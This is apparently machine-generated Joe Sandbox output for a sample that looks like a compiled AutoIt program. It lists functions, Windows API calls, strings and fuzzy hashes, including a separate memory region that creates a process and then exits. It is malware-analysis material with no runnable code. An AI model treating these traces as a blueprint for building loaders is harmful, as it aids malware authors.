LoadIconW.USER32(00000063), ref: 00183A76
LoadIconW.USER32(000000A4), ref: 00183A88
LoadIconW.USER32(000000A2), ref: 00183A9A
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00183AC0
RegisterClassExW.USER32(?), ref: 00183B16

Part of subcall function 00183041: GetSysColorBrush.USER32(0000000F), ref: 00183074
Part of subcall function 00183041: RegisterClassExW.USER32(00000030), ref: 0018309E
Part of subcall function 00183041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 001830AF
Part of subcall function 00183041: InitCommonControlsEx.COMCTL32(?), ref: 001830CC
Part of subcall function 00183041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 001830DC
Part of subcall function 00183041: LoadIconW.USER32(000000A9), ref: 001830F2
Part of subcall function 00183041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00183101

Strings

#, xrefs: 00183AFB
0, xrefs: 00183AF4
AutoIt v3, xrefs: 00183B05

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: b7a52cd41f0e2231d35735b45fb57b68b4ce283be9bc4aed95f75876697c4493
Instruction ID: e15a7ffbac758642e1c07f720494650e4a769cbe63a8e74b63ac52e8fe9c889f
Opcode Fuzzy Hash: b7a52cd41f0e2231d35735b45fb57b68b4ce283be9bc4aed95f75876697c4493
Instruction Fuzzy Hash: A6214678D40718AFEB21DFA4FD4DB9DBBB4FB09711F10012AF940AA2A2D3B556508F85

Function 00183766 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

/AutoIt3ExecuteLine, xrefs: 001838A7
>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 001837AE
/AutoIt3OutputDebug, xrefs: 00183892
R$, xrefs: 001BD213
CMDLINERAW, xrefs: 001837FB
/AutoIt3ExecuteScript, xrefs: 001838BC
CMDLINE, xrefs: 00183822
/ErrorStdOut, xrefs: 0018387D

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$R$
API String ID: 1825951767-2850020189
Opcode ID: 26c7df87fab613ea66140330021cc634b780633b6e7a3564619d4b75b272f512
Instruction ID: c98a39958a4151aeb41d140d83b559ef00872735d41d236404e1f549ca838190
Opcode Fuzzy Hash: 26c7df87fab613ea66140330021cc634b780633b6e7a3564619d4b75b272f512
Instruction Fuzzy Hash: CDA16D7691022D9BCB04FBA4DC95AEEB779BF25700F44052AF416A7192EF749B08CF60

Function 0018F76F Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 001A0162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 001A0193
Part of subcall function 001A0162: MapVirtualKeyW.USER32(00000010,00000000), ref: 001A019B
Part of subcall function 001A0162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 001A01A6
Part of subcall function 001A0162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 001A01B1
Part of subcall function 001A0162: MapVirtualKeyW.USER32(00000011,00000000), ref: 001A01B9
Part of subcall function 001A0162: MapVirtualKeyW.USER32(00000012,00000000), ref: 001A01C1

Part of subcall function 001960F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0018F930), ref: 00196154

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0018F9CD
OleInitialize.OLE32(00000000), ref: 0018FA4A
CloseHandle.KERNEL32(00000000), ref: 001C45C8

Strings

S$, xrefs: 0018F7EB
\T$, xrefs: 0018F7F7
%!, xrefs: 0018F796, 0018F7A8, 0018F96E, 0018FA51
<W$, xrefs: 0018F930

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID: <W$$\T$$%!$S$
API String ID: 1986988660-3227871379
Opcode ID: 73993a1b8b1af8284a350cf768416441d3a80cba31b75639da0032a25819c9af
Instruction ID: 116cf59acda187476722461f202f6c6399c9aeb670f31297968f24e2b0d6a3e2
Opcode Fuzzy Hash: 73993a1b8b1af8284a350cf768416441d3a80cba31b75639da0032a25819c9af
Instruction Fuzzy Hash: 5081CEB8911E60CFC384EF39B848619BBE5FB5A7167A0817AE099CB273E7704495CF10

Function 01160E28 Relevance: 10.7, APIs: 7, Instructions: 151
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01160E6D

Memory Dump Source

Source File: 00000001.00000002.1290068241.0000000001160000.00000040.00000020.00020000.00000000.sdmp, Offset: 01160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1160000_tNXl4XhgmV.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
Instruction ID: daae242540ffd787782db210f473386096cec05bf52704071978d35f2121c5b0
Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
Instruction Fuzzy Hash: 4751F875A50209FBEB24DFA4CC49FEE7778AF4C700F108954F61AEA1C0DB759A448B61

Function 001839D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00183A03
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00183A24
ShowWindow.USER32(00000000,?,?), ref: 00183A38
ShowWindow.USER32(00000000,?,?), ref: 00183A41

Strings

edit, xrefs: 00183A1E
AutoIt v3, xrefs: 001839FB, 00183A00, 00183A01

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: aae76801d18cc7a1e231ec46ce8e0a4f6b37b932ca392515b63e66e8f4bcae60
Instruction ID: e2b6d0d590bcfb4333de7a06b7ead27d16f48b074ce89f88cddac3e8dda469af
Opcode Fuzzy Hash: aae76801d18cc7a1e231ec46ce8e0a4f6b37b932ca392515b63e66e8f4bcae60
Instruction Fuzzy Hash: C1F03A746806A07FEA7197277C0CE2B3E7DE7C7F50F00002ABD40A21B2C2A10C10CAB0

Function 0018407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 001BD3D7

Part of subcall function 00187BCC: _memmove.LIBCMT ref: 00187C06

_memset.LIBCMT ref: 001840FC
_wcscpy.LIBCMT ref: 00184150
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00184160

Strings

Line: , xrefs: 001BD400

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: ffd171f49a1248722e311688c86c9ec47e7008e02c28168235060e4bc48e2737
Instruction ID: 536a8d3e488a4d53db4cff466aa675e483f23fba166a1c5dde0ea2b6b6ebf98d
Opcode Fuzzy Hash: ffd171f49a1248722e311688c86c9ec47e7008e02c28168235060e4bc48e2737
Instruction Fuzzy Hash: 9F319E71008715ABD325FB60EC4ABDB77D8AF65304F20451AF685960A2EFB4A748CB92

Function 001A541D Relevance: 7.7, APIs: 5, Instructions: 163
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 001A547B
_memcpy_s.LIBCMT ref: 001A54ED
__read_nolock.LIBCMT ref: 001A554B
__filbuf.LIBCMT ref: 001A556E
_memset.LIBCMT ref: 001A55B2

Part of subcall function 001A8B28: __getptd_noexit.LIBCMT ref: 001A8B28

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
Instruction ID: 1ab9523a04f250b139ad75cf0d502c5e5f291cc21ab8a935e24ec2df0cabb371
Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
Instruction Fuzzy Hash: CC51D778E08B05DBCB248FA9D8405AE77B3AF56331F248729F825962D1E771DD908B40

Function 0018686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 00184DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,002452F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00184E0F

_free.LIBCMT ref: 001BE263
_free.LIBCMT ref: 001BE2AA

Part of subcall function 00186A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00186BAD

Strings

Bad directive syntax error, xrefs: 001BE292
>>>AUTOIT SCRIPT<<<, xrefs: 001BE039

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 2861923089-1757145024
Opcode ID: ec0090d5435d0e8692bf75633c4d026ed9951b0f5d01597ea2e251b21dc82250
Instruction ID: f27f8fb232b2e6f8eecf41d791c0db456a536d303d619548195f9f0075721158
Opcode Fuzzy Hash: ec0090d5435d0e8692bf75633c4d026ed9951b0f5d01597ea2e251b21dc82250
Instruction Fuzzy Hash: FB917071A10219AFCF14EFA4CC819EDB7B4FF29310F10456AF816AB2A1DB709A15CF50

Function 011628D8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143fileCOMMON

Download Yara Rule

APIs

Part of subcall function 011627C8: Sleep.KERNELBASE(000001F4), ref: 011627D9

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 011629DA

Strings

C3PQP3S8OVSO27M, xrefs: 01162A5A, 01162A5D

Memory Dump Source

Source File: 00000001.00000002.1290068241.0000000001160000.00000040.00000020.00020000.00000000.sdmp, Offset: 01160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1160000_tNXl4XhgmV.jbxd

Similarity

API ID: CreateFileSleep
String ID: C3PQP3S8OVSO27M
API String ID: 2694422964-4176362519
Opcode ID: 22c25994c2bc5d182a392d7295bb89f9dd968534ec233fd4ac1cf28543548c08
Instruction ID: f5ebaec288ac16dee7340152ceb46a7765bb06e40d10ec4671be0eac25b6e228
Opcode Fuzzy Hash: 22c25994c2bc5d182a392d7295bb89f9dd968534ec233fd4ac1cf28543548c08
Instruction Fuzzy Hash: 78519531D14259DBEF25DBA4C814BEFBBB9AF55304F0045A9E6087B2C0D7BA0B45CBA1

Function 001835B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,001835A1,SwapMouseButtons,00000004,?), ref: 001835D4
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,001835A1,SwapMouseButtons,00000004,?,?,?,?,00182754), ref: 001835F5
RegCloseKey.KERNELBASE(00000000,?,?,001835A1,SwapMouseButtons,00000004,?,?,?,?,00182754), ref: 00183617

Strings

Control Panel\Mouse, xrefs: 001835D2

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 8ffa67a34e02a9881f36f6facbf5a955c586572cdcb3f21ae5a9ab84c02ee4cb
Instruction ID: e01e1c98810a191f7c5b215d204f8146ea25dccff4a05ad26a7a93f62773701f
Opcode Fuzzy Hash: 8ffa67a34e02a9881f36f6facbf5a955c586572cdcb3f21ae5a9ab84c02ee4cb
Instruction Fuzzy Hash: 59115771610208BFDB209F68EC84EBEBBB9EF04B40F258469F805D7214E3719F409BA0

Function 001E955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00184EE5: _fseek.LIBCMT ref: 00184EFD

Part of subcall function 001E9734: _wcscmp.LIBCMT ref: 001E9824
Part of subcall function 001E9734: _wcscmp.LIBCMT ref: 001E9837

_free.LIBCMT ref: 001E96A2
_free.LIBCMT ref: 001E96A9
_free.LIBCMT ref: 001E9714

Part of subcall function 001A2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,001A9A24), ref: 001A2D69
Part of subcall function 001A2D55: GetLastError.KERNEL32(00000000,?,001A9A24), ref: 001A2D7B

_free.LIBCMT ref: 001E971C

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: 6cef8eb787e4e551deb87a41cfcc5f328edab007a71f9a3129ff1eb0514b26a6
Instruction ID: dcbeb332cfb6c039ef2df223ea56681b583def3e5db26786ee95f4bf29f435e1
Opcode Fuzzy Hash: 6cef8eb787e4e551deb87a41cfcc5f328edab007a71f9a3129ff1eb0514b26a6
Instruction Fuzzy Hash: BA514DB5D04259AFDF249FA5CC81AAEBBB9FF58300F10449EF609A3251DB715A80CF58

Function 001A470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 001A47A0
__flush.LIBCMT ref: 001A47C0
__write.LIBCMT ref: 001A47F3
__flsbuf.LIBCMT ref: 001A4821

Part of subcall function 001A8B28: __getptd_noexit.LIBCMT ref: 001A8B28

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction ID: 4d7e5e317da3ff207e80132e6f132c03aeee6694d69aa920d7721be5dfc90144
Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction Fuzzy Hash: 0341E67DA007859BDB28CFE9D8819AE77A5EFC3360B24813DE815C7640D7B4DD408B40

Function 00184C70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00184CBA

Strings

EA06, xrefs: 001BD8CC
AU3!P/!, xrefs: 00184CB4

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: _memmove
String ID: AU3!P/!$EA06
API String ID: 4104443479-2528700987
Opcode ID: 983c713d1cc6c66be054f7de428cf4d581ebc836ad8fc4832f11ea803b79235f
Instruction ID: 74c208ab8d6b7019561c51197da631963debd73f9e2ac5b6bcbfeaf08d58543f
Opcode Fuzzy Hash: 983c713d1cc6c66be054f7de428cf4d581ebc836ad8fc4832f11ea803b79235f
Instruction Fuzzy Hash: C3419D21A0026A57CF25BBE4C8517BE7FA2DB35300F284275EC829B282DF245F448FA1

Function 00187285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 001BEA39
GetOpenFileNameW.COMDLG32(?), ref: 001BEA83

Part of subcall function 00184750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00184743,?,?,001837AE,?), ref: 00184770

Part of subcall function 001A0791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 001A07B0

Strings

X, xrefs: 001BEA51

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: ca12ffcfa75edd6aba95cb90905b33325b02bdf7a922f06c91d9eabe5a043a61
Instruction ID: a653f3c471ebc1f460cb65c5a6191df8a1c1473bd1069cafbcdb7da4b7650cf7
Opcode Fuzzy Hash: ca12ffcfa75edd6aba95cb90905b33325b02bdf7a922f06c91d9eabe5a043a61
Instruction Fuzzy Hash: CE210870A102889BCB41EFD4C845BDE7BFDAF49304F104019F808EB281DFB45A488F91

Function 001E8D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 001E8DAC
__fread_nolock.LIBCMT ref: 001E8DC1

Strings

EA06, xrefs: 001E8DF3

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: 327bcf9526039f30c4871121f423959dd72a813e1f040d275fde693856ac8b8d
Instruction ID: 571c9650d70a471a3892268ff858ca5f5be88704876abc815064aef80491fb37
Opcode Fuzzy Hash: 327bcf9526039f30c4871121f423959dd72a813e1f040d275fde693856ac8b8d
Instruction Fuzzy Hash: AA01F572C046587EDB28CAA8CC16EEEBBF8DB16301F00419AF556D2181E975A6088BA0

Function 01161508 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 0116154D
ExitProcess.KERNEL32(00000000), ref: 0116156C

Strings

D, xrefs: 01161519

Memory Dump Source

Source File: 00000001.00000002.1290068241.0000000001160000.00000040.00000020.00020000.00000000.sdmp, Offset: 01160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1160000_tNXl4XhgmV.jbxd

Similarity

API ID: Process$CreateExit
String ID: D
API String ID: 126409537-2746444292
Opcode ID: 9ec10d9bb68332e7bcdb3756cd9d8bc900757a5150bae08cbb91c2426b35d2e1
Instruction ID: 1c8f9de4d29f028ef4905f6775da87d5fe1f3ed94f4d8e450579e0ce69b6dc19
Opcode Fuzzy Hash: 9ec10d9bb68332e7bcdb3756cd9d8bc900757a5150bae08cbb91c2426b35d2e1
Instruction Fuzzy Hash: 36F0EC7194024CABDB64EFE4CC49FEE777CBF44701F448909FA0A9A184DB7596188B61

Function 001E98E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 001E98F8
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 001E990F

Strings

aut, xrefs: 001E9909

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: cb012bf7bb393e514711ff2af2ffa464d668fc7356f1e5997f0bf45c03117595
Instruction ID: bdc6d582aa6e0da6e9da8226a185689dabfaf85e17e9de7b8a8686c76f1f6d3b
Opcode Fuzzy Hash: cb012bf7bb393e514711ff2af2ffa464d668fc7356f1e5997f0bf45c03117595
Instruction Fuzzy Hash: 49D05B7558030D6FDB609B90EC0DF96773CD704700F0002B1BE5495091D97055548B91

Function 001FCADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
